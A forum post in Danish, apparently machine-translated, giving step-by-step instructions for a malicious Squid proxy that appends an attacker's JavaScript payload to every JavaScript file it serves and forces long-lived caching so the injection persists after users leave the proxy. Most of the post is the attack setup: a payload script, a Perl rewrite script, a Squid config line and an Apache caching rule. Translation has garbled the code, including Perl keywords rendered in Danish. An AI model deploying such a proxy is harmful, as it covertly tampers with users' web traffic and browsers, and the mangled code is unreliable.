Dette indlæg blev sidst redigeret af Mo Xiaowen den 2015-6-7 kl. 23:19
Dette kan gøres ved blot at ændre konfigurationen af SQUID
Hvad er SQUID?
Squid er en software, der cacher internetdata, modtager downloadanmodninger fra brugere og automatisk behandler de downloadede data. Når en bruger ønsker at downloade en hjemmeside, kan han sende en anmodning til Squid, bede Squid om at downloade den på hans vegne, derefter forbinder Squid til hjemmesiden og anmoder om hjemmesiden, og sender derefter hjemmesiden til brugeren, mens han beholder en backup; når andre brugere ansøger om samme side, sender Squid straks den gemte backup til brugeren, så brugeren føler, at hastigheden er ret hurtig. Squid kan proxy-protokoller som HTTP, FTP, GOPHER, SSL og WAIS, og Squid kan håndtere det automatisk, og du kan opsætte Squid efter dine behov for at filtrere uønskede ting fra.
Squid kan fungere i mange operativsystemer, såsom AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 osv.
Implementeringen er meget enkel:
1. Installer Squid på én Linux-server.
2. Modificere serverens kode, indsætte et stykke af vores kode i al den transmitterede javascrip og sende den ud.
3. Sæt cache-tiden for vores modificerede js-fil så højt som muligt.
Denne metode gælder også for hjemmesider med SSL aktiveret; hvis hjemmesiden indlæser en usikker ressource (såsom jquery for et HTTP-site), vil de fleste browsere give en advarsel, men få lægger mærke til det.
Chema sagde, at mere end 5.000 mennesker brugte hans proxy få dage efter, han frigav den, og de fleste brugte den til dårlige ting, fordi de brugte proxyen, så de troede, den var anonym og sikker, men de forventede aldrig, at proxyserveren også ville gøre dårlige ting.
Lav din ondsindede proxyserver
Hvis du allerede har en Squid proxy-server, skal du også bruge en webserver som Apache.
Trin 1: Opret en nyttelast
Jeg bruger et simpelt script som demonstration til at pege alle hyperlinks til min hjemmeside.
/etc/squid/payload.js
[mw_shl_code=javascrip fjern t, sand]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Trin 2: Skriv et script, der inficerer alle JS-filer
/etc/squid/poison.pl
[mw_shl_code=perl, sandt]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
mens (<>)
{
chomp $_;
hvis($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("kat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
tryk "http://127.0.0.1:80/tmp/$pid-$count.js";
}
ellers
{
tryk "$_";
}
$count++;
}[/mw_shl_code]
Dette script bruger wget til at hente den originale javascrip fra siden og fjerne t-filen, derefter tilføje koden i /etc/squid/payload.js og sende den ændrede fil til klienten, mens du skal oprette /var/www/tmp-mappen og lade squid skrive filer i den. Denne mappe gemmer de modificerede js-filer.
Trin 3: Kombiner ovenstående script med Squid
Tilføj det i /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Trin 4: Få cachen til aldrig at fejle
/var/www/tmp/.htaccess
[mw_shl_code=html,sandt] Udløber Aktiv
UdløberDefault "adgang plus 3000 dage"[/mw_shl_code]
Dette vil fortælle Apache, at han skal give ham en lang udløbstid, indtil brugeren har ryddet op i sin cache.
Hvis du forbinder denne proxy, vil et klik på et hvilket som helst hyperlink omdirigere dig til min hjemmeside, og cachen vil stadig eksistere, selvom du ikke bruger proxyen senere. Jeg brugte bare en ikke-aggressiv payload, og med denne metode kan hackere gøre meget mere. Så mind dig selv og venner om at være forsigtige med at bruge gratis proxies.
|
Opslået på 19/01/2015 02.34.56
|
|
|
|
Opslået på 19/01/2015 08.48.45
|
Udlejer|
Opslået på 20/01/2015 14.36.06
|
